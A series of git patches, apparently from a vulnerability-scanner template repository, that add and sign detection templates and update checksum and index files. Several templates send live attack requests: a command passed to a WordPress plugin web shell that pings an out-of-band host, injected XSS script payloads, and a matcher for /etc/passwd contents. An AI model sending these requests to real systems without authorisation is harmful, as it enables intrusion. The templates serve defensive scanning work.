Subject: [PATCH 0595/1768] Auto Generated New Template Addition List [Mon May 6 03:56:40 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index eabf494839..f8c091fe57 100644 --- a/.new-additions +++ b/.new-additions @@ -25,6 +25,7 @@ http/cves/2024/CVE-2024-3136.yaml http/cves/2024/CVE-2024-31621.yaml http/cves/2024/CVE-2024-31849.yaml http/cves/2024/CVE-2024-32399.yaml +http/cves/2024/CVE-2024-4040.yaml http/cves/2024/CVE-2024-4348.yaml http/default-logins/crushftp/crushftp-anonymous-login.yaml http/default-logins/crushftp/crushftp-default-login.yaml From 70a88801e7d0c36b3b1891c1d50699f618ded68b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 6 May 2024 03:56:47 +0000 Subject: [PATCH 0596/1768] Auto Generated Templates Checksum [Mon May 6 03:56:47 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index f3f2536e90..9b7cb21c1d 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3273,6 +3273,7 @@ http/cves/2024/CVE-2024-31849.yaml:3da1475fe1c4acaa241663e897ab6a00caf6b49b http/cves/2024/CVE-2024-32399.yaml:313686632b5766a7b54093c4c7201abe93e487e6 http/cves/2024/CVE-2024-3273.yaml:a3f9f69c4c7f4f6e45f66d06fead2fb61338db17 http/cves/2024/CVE-2024-3400.yaml:bcfc68b17ac852e46c39e29ea64fefca3401b61c +http/cves/2024/CVE-2024-4040.yaml:aa3591d71e395e02158f6373b2848b8c66ee962a http/cves/2024/CVE-2024-4348.yaml:8c93845e16310b707885c81024088d1eb3d99f0b http/default-logins/3com/3Com-wireless-default-login.yaml:7c816fc8c0b14d7f9c5b111259ca75c4f96a4671 http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce @@ -3688,7 +3689,7 @@ http/exposed-panels/cudatel-panel.yaml:c079445a851e40233a8c56dfda788e5c9b32547b http/exposed-panels/cvent-panel-detect.yaml:a87e443274a8ae60dfeb181ff9e3ab288246d852 http/exposed-panels/cwp-webpanel.yaml:9ccee2ed3e4baface4e30a0567b2e46c2976851e http/exposed-panels/cx-cloud-login.yaml:eacbb09b6c7b16b4234ac371e71b2130c738cb5e -http/exposed-panels/cyberchef-panel.yaml:9c355c539653f2078acb9d1df5bb072431ecc25c +http/exposed-panels/cyberchef-panel.yaml:53cd896d234ec5f37fa902dfd42e5b07227b7536 http/exposed-panels/cyberoam-ssl-vpn-panel.yaml:93abfca996a479f9098e274c3fa5519f6e64f3f9 http/exposed-panels/d-link-wireless.yaml:dbcf6912b865faa71a59141e83d00456ce6ceef0 http/exposed-panels/dahua-web-panel.yaml:c7b88f6dd9cec15974fab83f071cf7ad63d37ee0 @@ -8475,7 +8476,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:e5a186f355e60daf23a56e56635cb7ad0873351e +templates-checksum.txt:4630de66137d776f99ae89e2ec9e258a2bb786a5 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From e5f3804bb064c6d5625764aeac7ab40ae2439adf Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 6 May 2024 03:57:25 +0000 Subject: [PATCH 0597/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 0c25f86bfc..30f1932dd6 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -30,6 +30,7 @@ on: - 'http/cves/2024/CVE-2024-31621.yaml' - 'http/cves/2024/CVE-2024-31849.yaml' - 'http/cves/2024/CVE-2024-32399.yaml' + - 'http/cves/2024/CVE-2024-4040.yaml' - 'http/cves/2024/CVE-2024-4348.yaml' - 'http/default-logins/crushftp/crushftp-anonymous-login.yaml' - 'http/default-logins/crushftp/crushftp-default-login.yaml' From bf61ae8824bb222d21a72323e100454857239b74 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 6 May 2024 03:58:25 +0000 Subject: [PATCH 0598/1768] Auto Template Signing [Mon May 6 03:58:25 UTC 2024] :robot: --- http/cves/2024/CVE-2024-4040.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-4040.yaml b/http/cves/2024/CVE-2024-4040.yaml index e60710087f..3830add6ba 100644 --- a/http/cves/2024/CVE-2024-4040.yaml +++ b/http/cves/2024/CVE-2024-4040.yaml @@ -122,3 +122,4 @@ http: part: body words: - "root:x:" +# digest: 490a00463044022034365345ca960cac174d54cf353f25ea720b065bf9bd3d8e354696368908c0b702203f998746363311340e85f3d692227a4c849f84ebe03837ea3004486821b6e19c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 081b83c866a80a3fa023f9188ae7342cc6e16fbc Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 6 May 2024 11:59:20 +0530 Subject: [PATCH 0599/1768] Create CVE-2023-4521.yaml --- http/cves/2023/CVE-2023-4521.yaml | 50 +++++++++++++++++++++++++++++++ 1 file changed, 50 insertions(+) create mode 100644 http/cves/2023/CVE-2023-4521.yaml diff --git a/http/cves/2023/CVE-2023-4521.yaml b/http/cves/2023/CVE-2023-4521.yaml new file mode 100644 index 0000000000..151127ce1b --- /dev/null +++ b/http/cves/2023/CVE-2023-4521.yaml @@ -0,0 +1,50 @@ +id: CVE-2023-4521 + +info: + name: Import XML and RSS Feeds < 2.1.5 - Unauthenticated RCE + author: princechaddha + severity: critical + description: The Import XML and RSS Feeds WordPress plugin before 2.1.5 allows unauthenticated attackers to execute arbitrary commands via a web shell. + impact: | + Allows unauthenticated attackers to execute arbitrary code on the target system. + remediation: | + Update the Import XML and RSS Feeds WordPress Plugin to the latest version to mitigate the vulnerability. + reference: + - https://wpscan.com/vulnerability/de2cdb38-3a9f-448e-b564-a798d1e93481 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-4521 + epss-score: 0.00156 + epss-percentile: 0.51418 + cpe: cpe:2.3:a:mooveagency:import_xml_and_rss_feeds:*:*:*:*:*:wordpress:*:* + metadata: + vendor: mooveagency + product: import_xml_and_rss_feeds + framework: wordpress + fofa-query: body="import-xml-feed" + tags: cve,cve2023,wordpress,wp,wpscan,unauth,rce + +flow: http(1) && http(2) + +http: + - raw: + - | + GET /wp-content/plugins/import-xml-feed/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Import XML and RSS Feeds' + + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/import-xml-feed/uploads/169227090864de013cac47b.php?cmd=ping+{{interactsh-url}}" + + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" From f0f70db137d8a64fd7c43764339573d616fa0e82 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 6 May 2024 07:22:32 +0000 Subject: [PATCH 0600/1768] Auto Generated New Template Addition List [Mon May 6 07:22:32 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index f8c091fe57..18ab45f224 100644 --- a/.new-additions +++ b/.new-additions @@ -39,6 +39,7 @@ http/exposed-panels/tixeo-panel.yaml http/misconfiguration/installer/eyoucms-installer.yaml http/misconfiguration/installer/sabnzbd-installer.yaml http/misconfiguration/titannit-web-exposure.yaml +http/takeovers/squadcast-takeover.yaml http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml http/vulnerabilities/titan/titannit-web-rce.yaml http/vulnerabilities/vbulletin/vbulletin-search-sqli.yaml From fbb44f9149463e05e3200968113eb41355d22ba2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 6 May 2024 07:22:39 +0000 Subject: [PATCH 0601/1768] Auto Generated Templates Checksum [Mon May 6 07:22:39 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 9b7cb21c1d..11b8368710 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3273,7 +3273,7 @@ http/cves/2024/CVE-2024-31849.yaml:3da1475fe1c4acaa241663e897ab6a00caf6b49b http/cves/2024/CVE-2024-32399.yaml:313686632b5766a7b54093c4c7201abe93e487e6 http/cves/2024/CVE-2024-3273.yaml:a3f9f69c4c7f4f6e45f66d06fead2fb61338db17 http/cves/2024/CVE-2024-3400.yaml:bcfc68b17ac852e46c39e29ea64fefca3401b61c -http/cves/2024/CVE-2024-4040.yaml:aa3591d71e395e02158f6373b2848b8c66ee962a +http/cves/2024/CVE-2024-4040.yaml:378a6ad71096d7285f0d1b2b51e2daee83e19a82 http/cves/2024/CVE-2024-4348.yaml:8c93845e16310b707885c81024088d1eb3d99f0b http/default-logins/3com/3Com-wireless-default-login.yaml:7c816fc8c0b14d7f9c5b111259ca75c4f96a4671 http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce @@ -6508,6 +6508,7 @@ http/takeovers/smartjob-takeover.yaml:bb0363423b3208375c0c1f61ed48187b90057ee8 http/takeovers/smugmug-takeover.yaml:6ea3ec73d535db0f8e87ea40aa458ac44a18f7d0 http/takeovers/softr-takeover.yaml:a47cd0392585f45846dbbb70a05574cc564e18e6 http/takeovers/sprintful-takeover.yaml:b9b552223b69e1b9086b442307c22de6f8bfa864 +http/takeovers/squadcast-takeover.yaml:a8c511305f938b313f5b2cb58136487b04e5c558 http/takeovers/strikingly-takeover.yaml:9aa7d5d97af3a23c2eddf1035ba17eea747db30f http/takeovers/surge-takeover.yaml:c3c45bfbe18ad235a9a5a999c73172baf77cdb1f http/takeovers/surveygizmo-takeover.yaml:9f2b0bb8599c05d03d37ce48e1b7ae2bdc92c523 @@ -8476,7 +8477,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:4630de66137d776f99ae89e2ec9e258a2bb786a5 +templates-checksum.txt:41633670f4c9b9e1168c239b4490fb0e102f1186 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From a03c7dc3413f5ca93be07099e3a0d87fa3a5ef81 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 6 May 2024 07:23:34 +0000 Subject: [PATCH 0602/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 30f1932dd6..adc827771a 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -44,6 +44,7 @@ on: - 'http/misconfiguration/installer/eyoucms-installer.yaml' - 'http/misconfiguration/installer/sabnzbd-installer.yaml' - 'http/misconfiguration/titannit-web-exposure.yaml' + - 'http/takeovers/squadcast-takeover.yaml' - 'http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml' - 'http/vulnerabilities/titan/titannit-web-rce.yaml' - 'http/vulnerabilities/vbulletin/vbulletin-search-sqli.yaml' From be3d7f3a1865c12d638d22483acad049690dfe41 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 6 May 2024 07:24:27 +0000 Subject: [PATCH 0603/1768] Auto Template Signing [Mon May 6 07:24:27 UTC 2024] :robot: --- http/takeovers/squadcast-takeover.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/takeovers/squadcast-takeover.yaml b/http/takeovers/squadcast-takeover.yaml index 7510d84bcf..8ee87a5070 100644 --- a/http/takeovers/squadcast-takeover.yaml +++ b/http/takeovers/squadcast-takeover.yaml @@ -33,3 +33,4 @@ http: - type: status status: - 404 +# digest: 4a0a00473045022073e3651947c403258a6376ad586534893f46abfcd2d9728c1d0edbeab2ff2be4022100f20a52cd2ab0ea4a4ebeabc28511e0ccb3aaaebffaac719e499d3662b7a127e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 68718f5d1329f45f5c89a79da8661869285ffc1a Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 6 May 2024 16:21:10 +0530 Subject: [PATCH 0604/1768] Create CVE-2023-44812.yaml --- http/cves/2023/CVE-2023-44812.yaml | 59 ++++++++++++++++++++++++++++++ 1 file changed, 59 insertions(+) create mode 100644 http/cves/2023/CVE-2023-44812.yaml diff --git a/http/cves/2023/CVE-2023-44812.yaml b/http/cves/2023/CVE-2023-44812.yaml new file mode 100644 index 0000000000..efd4a6916c --- /dev/null +++ b/http/cves/2023/CVE-2023-44812.yaml @@ -0,0 +1,59 @@ +id: CVE-2023-44812 + +info: + name: mooSocial v.3.1.8 - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + A cross-site Scripting (XSS) vulnerability in mooSocial v.3.1.8 allows a remote attacker to execute arbitrary code by sending a crafted payload to the admin_redirect_url parameter of the user login function. + impact: | + Allows attackers to execute malicious scripts in the context of a user's browser session. + remediation: | + Apply the vendor-supplied patch or upgrade to a version that addresses the XSS vulnerability. + reference: + - https://github.com/nomi-sec/PoC-in-GitHub + - https://github.com/ahrixia/CVE-2023-44812 + - https://nvd.nist.gov/vuln/detail/CVE-2023-44812 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-44812 + cwe-id: CWE-79 + epss-score: 0.00069 + epss-percentile: 0.28937 + cpe: cpe:2.3:a:moosocial:moosocial:3.1.8:*:*:*:*:*:*:* + metadata: + vendor: moosocial + product: moosocial + fofa-query: icon_hash="702863115" + tags: cve2023,cve,moosocial,xss + +flow: http(1) && http(2) + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + part: body + words: + - "mooSocial" + internal: true + case-insensitive: true + + - method: GET + path: + - "{{BaseURL}}/admin/home/login?admin_redirect_url=aHR0cDovL2xvY2FsaG9zdC9tb29zb2NpYWwvYWRtaW4vcGx1Z2lucw%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3etest" + + host-redirects: true + max-redirects: 2 + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(header, "text/html")' + - 'contains(body, "")' + condition: and From 268c99a10ce801c308e067802558cefd71700a55 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 6 May 2024 16:21:22 +0530 Subject: [PATCH 0605/1768] Create CVE-2024-22927.yaml --- http/cves/2024/CVE-2024-22927.yaml | 51 ++++++++++++++++++++++++++++++ 1 file changed, 51 insertions(+) create mode 100644 http/cves/2024/CVE-2024-22927.yaml diff --git a/http/cves/2024/CVE-2024-22927.yaml b/http/cves/2024/CVE-2024-22927.yaml new file mode 100644 index 0000000000..c6630c9477 --- /dev/null +++ b/http/cves/2024/CVE-2024-22927.yaml @@ -0,0 +1,51 @@ +id: CVE-2024-22927 + +info: + name: eyoucms v.1.6.5 - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + Cross Site Scripting (XSS) vulnerability in the func parameter in eyoucms v.1.6.5 allows a remote attacker to run arbitrary code via crafted URL. + impact: | + Allows attackers to execute malicious scripts on the victim's browser. + remediation: | + Upgrade eyoucms to version 1.6.6 or later to fix the XSS vulnerability. + reference: + - https://github.com/weng-xianhu/eyoucms/issues/57 + - https://nvd.nist.gov/vuln/detail/CVE-2024-22927 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-22927 + cwe-id: CWE-79 + epss-score: 0.00064 + epss-percentile: 0.26844 + cpe: cpe:2.3:a:eyoucms:eyoucms:1.6.5:*:*:*:*:*:*:* + metadata: + vendor: eyoucms + product: eyoucms + fofa-query: title="eyoucms" + tags: cve2024,cve,eyoucms,cms,xss + +http: + - method: POST + path: + - "{{BaseURL}}/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxXCI%2BPFNjUmlQdCA%2BYWxlcnQoZG9jdW1lbnQuZG9tYWluKTwvU2NSaVB0PiIsInNpemUiOiIyMDk3MTUyIiwiaW5wdXQiOiIiLCJmdW5jIjoiaGVhZF9waWNfY2FsbF9iYWNrIiwicGF0aCI6ImFsbGltZyIsImlzX3dhdGVyIjoiMSIsImFsZyI6IkhTMjU2In0&lang=cn&m=admin&unneed_syn=" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'name="num" value="1">' + - 'id="eytime"' + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From ff1e83855bf87ff7487cc5bcae962aa48047d27b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Krzysztof=20Zaj=C4=85c?= Date: Mon, 6 May 2024 13:00:27 +0200 Subject: [PATCH 0606/1768] more comprehensive RDWeb panel detection --- http/exposed-panels/rdweb-panel.yaml | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) diff --git a/http/exposed-panels/rdweb-panel.yaml b/http/exposed-panels/rdweb-panel.yaml index d960b21d2e..59b76badf9 100644 --- a/http/exposed-panels/rdweb-panel.yaml +++ b/http/exposed-panels/rdweb-panel.yaml @@ -26,14 +26,16 @@ http: host-redirects: true max-redirects: 1 - matchers-condition: and + matchers-condition: or matchers: - type: word part: header words: - "TSWAFeatureCheckCookie=true; path=/RDWeb/" - - type: status - status: - - 302 -# digest: 4b0a00483046022100b7bd22946afb7a0c73f3415567391e04361324b834a9c1f09a9c667ff9037b9d022100f0f3c01f592d151a12b1646bc53cc6476f189947426cadaeecc52cc2e1d37cd2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - type: word + part: response + condition: and + words: + - "" + - "Microsoft Remote Desktop" From 6d17574d018a6e7aa272cda1a57050cea2253dd1 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 6 May 2024 11:06:43 +0000 Subject: [PATCH 0607/1768] Auto Generated New Template Addition List [Mon May 6 11:06:43 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 18ab45f224..9293c69f1c 100644 --- a/.new-additions +++ b/.new-additions @@ -10,6 +10,7 @@ http/cves/2023/CVE-2023-31446.yaml http/cves/2023/CVE-2023-32077.yaml http/cves/2023/CVE-2023-38964.yaml http/cves/2023/CVE-2023-43208.yaml +http/cves/2023/CVE-2023-44812.yaml http/cves/2023/CVE-2023-45375.yaml http/cves/2023/CVE-2023-46347.yaml http/cves/2023/CVE-2023-4973.yaml From 69e355116976571e6a3545701c47a35637d088be Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 6 May 2024 11:06:49 +0000 Subject: [PATCH 0608/1768] Auto Generated Templates Checksum [Mon May 6 11:06:49 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 11b8368710..30e911bee7 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3161,6 +3161,7 @@ http/cves/2023/CVE-2023-4415.yaml:21b79187558e4d88b2c453cfe6c99cc13c84fccb http/cves/2023/CVE-2023-44352.yaml:838f6b730d02b9335f6e41cfa6f1e28ab7c3828e http/cves/2023/CVE-2023-44353.yaml:34be9ca42f557484dff5d8434d1e34b192299eb3 http/cves/2023/CVE-2023-4451.yaml:3201ce3e57a6ef644539ab1fcc4a1d0e37f8b542 +http/cves/2023/CVE-2023-44812.yaml:12a4e456df2811c0776d971726c78345b1c1c185 http/cves/2023/CVE-2023-45375.yaml:e9a83c1c9c55540677f50b89260a2df23d3c2c6e http/cves/2023/CVE-2023-4547.yaml:a6e77eeb6c623c0317df91820a3523b09d8b05d5 http/cves/2023/CVE-2023-45542.yaml:8a9af0dceceac9809c1a2971d0600b81071ec0f2 @@ -6508,7 +6509,7 @@ http/takeovers/smartjob-takeover.yaml:bb0363423b3208375c0c1f61ed48187b90057ee8 http/takeovers/smugmug-takeover.yaml:6ea3ec73d535db0f8e87ea40aa458ac44a18f7d0 http/takeovers/softr-takeover.yaml:a47cd0392585f45846dbbb70a05574cc564e18e6 http/takeovers/sprintful-takeover.yaml:b9b552223b69e1b9086b442307c22de6f8bfa864 -http/takeovers/squadcast-takeover.yaml:a8c511305f938b313f5b2cb58136487b04e5c558 +http/takeovers/squadcast-takeover.yaml:779b3c54dab067369ffa422d108a2de9b81a87b2 http/takeovers/strikingly-takeover.yaml:9aa7d5d97af3a23c2eddf1035ba17eea747db30f http/takeovers/surge-takeover.yaml:c3c45bfbe18ad235a9a5a999c73172baf77cdb1f http/takeovers/surveygizmo-takeover.yaml:9f2b0bb8599c05d03d37ce48e1b7ae2bdc92c523 @@ -8477,7 +8478,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:41633670f4c9b9e1168c239b4490fb0e102f1186 +templates-checksum.txt:dabf4f54664a402ff014d2ef07584bb7240bb0b0 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 8153efe58d11a437071ce9bd41d0f2abf0697ff7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 6 May 2024 11:06:51 +0000 Subject: [PATCH 0609/1768] Auto Generated cves.json [Mon May 6 11:06:51 UTC 2024] :robot: --- cves.json | 10 ++++++++++ cves.json-checksum.txt | 2 +- 2 files changed, 11 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index f010ecf746..423775d2f0 100644 --- a/cves.json +++ b/cves.json @@ -289,6 +289,7 @@ {"ID":"CVE-2015-4074","Info":{"Name":"Joomla! Helpdesk Pro plugin \u003c1.4.0 - Local File Inclusion","Severity":"high","Description":"Directory traversal vulnerability in the Helpdesk Pro plugin before 1.4.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the filename parameter in a ticket.download_attachment task.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-4074.yaml"} {"ID":"CVE-2015-4127","Info":{"Name":"WordPress Church Admin \u003c0.810 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Church Admin plugin before 0.810 allows remote attackers to inject arbitrary web script or HTML via the address parameter via index.php/2015/05/21/church_admin-registration-form/.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-4127.yaml"} {"ID":"CVE-2015-4414","Info":{"Name":"WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal","Severity":"medium","Description":"WordPress SE HTML5 Album Audio Player 1.1.0 contains a directory traversal vulnerability in download_audio.php that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-4414.yaml"} +{"ID":"CVE-2015-4455","Info":{"Name":"WordPress Plugin Aviary Image Editor Addon For Gravity Forms 3.0 Beta - Arbitrary File Upload","Severity":"critical","Description":"Unrestricted file upload vulnerability in includes/upload.php in the Aviary Image Editor Add-on For Gravity Forms plugin 3.0 beta for WordPress allows remote attackers to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in wp-content/uploads/gform_aviary.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2015/CVE-2015-4455.yaml"} {"ID":"CVE-2015-4632","Info":{"Name":"Koha 3.20.1 - Directory Traversal","Severity":"high","Description":"Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-4632.yaml"} {"ID":"CVE-2015-4666","Info":{"Name":"Xceedium Xsuite \u003c=2.4.4.5 - Local File Inclusion","Severity":"medium","Description":"Xceedium Xsuite 2.4.4.5 and earlier is vulnerable to local file inclusion via opm/read_sessionlog.php that allows remote attackers to read arbitrary files in the logFile parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-4666.yaml"} {"ID":"CVE-2015-4668","Info":{"Name":"Xsuite \u003c=2.4.4.5 - Open Redirect","Severity":"medium","Description":"Xsuite 2.4.4.5 and prior contains an open redirect vulnerability, which can allow a remote attacker to redirect users to arbitrary web sites and conduct phishing attacks via a malicious URL in the redirurl parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2015/CVE-2015-4668.yaml"} @@ -773,6 +774,7 @@ {"ID":"CVE-2019-6715","Info":{"Name":"W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated File Read / Directory Traversal","Severity":"high","Description":"WordPress plugin W3 Total Cache before version 0.9.4 allows remote attackers to read arbitrary files via the SubscribeURL field in SubscriptionConfirmation JSON data via pub/sns.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2019/CVE-2019-6715.yaml"} {"ID":"CVE-2019-6799","Info":{"Name":"phpMyAdmin \u003c4.8.5 - Local File Inclusion","Severity":"medium","Description":"phpMyAdmin before 4.8.5 is susceptible to local file inclusion. When the AllowArbitraryServer configuration setting is set to true, an attacker can read, with the use of a rogue MySQL server, any file on the server that the web server's user can access. This is related to the mysql.allow_local_infile PHP configuration, and the inadvertent ignoring of options(MYSQLI_OPT_LOCAL_INFIL calls.\n","Classification":{"CVSSScore":"5.9"}},"file_path":"http/cves/2019/CVE-2019-6799.yaml"} {"ID":"CVE-2019-6802","Info":{"Name":"Pypiserver \u003c1.2.5 - Carriage Return Line Feed Injection","Severity":"medium","Description":"Pypiserver through 1.2.5 and below is susceptible to carriage return line feed injection. An attacker can set arbitrary HTTP headers and possibly conduct cross-site scripting attacks via a %0d%0a in a URI.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-6802.yaml"} +{"ID":"CVE-2019-7139","Info":{"Name":"Magento - SQL Injection","Severity":"critical","Description":"An unauthenticated user can execute SQL statements that allow arbitrary read access to the underlying database, which causes sensitive data leakage.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-7139.yaml"} {"ID":"CVE-2019-7192","Info":{"Name":"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution","Severity":"critical","Description":"This improper access control vulnerability allows remote attackers to gain unauthorized access to the system. To fix these vulnerabilities, QNAP recommend updating Photo Station to their latest versions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-7192.yaml"} {"ID":"CVE-2019-7219","Info":{"Name":"Zarafa WebApp \u003c=2.0.1.47791 - Cross-Site Scripting","Severity":"medium","Description":"Zarafa WebApp 2.0.1.47791 and earlier contains an unauthenticated reflected cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-7219.yaml"} {"ID":"CVE-2019-7238","Info":{"Name":"Sonatype Nexus Repository Manager \u003c3.15.0 - Remote Code Execution","Severity":"critical","Description":"Sonatype Nexus Repository Manager before 3.15.0 is susceptible to remote code execution.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-7238.yaml"} @@ -1971,6 +1973,7 @@ {"ID":"CVE-2022-48165","Info":{"Name":"Wavlink - Improper Access Control","Severity":"high","Description":"Wavlink WL-WN530H4 M30H4.V5030.210121 is susceptible to improper access control in the component /cgi-bin/ExportLogs.sh. An attacker can download configuration data and log files, obtain admin credentials, and potentially execute unauthorized operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-48165.yaml"} {"ID":"CVE-2022-48197","Info":{"Name":"Yahoo User Interface library (YUI2) TreeView v2.8.2 - Cross-Site Scripting","Severity":"medium","Description":"Reflected cross-site scripting (XSS) exists in the TreeView of YUI2 through 2800: up.php sam.php renderhidden.php removechildren.php removeall.php readd.php overflow.php newnode2.php 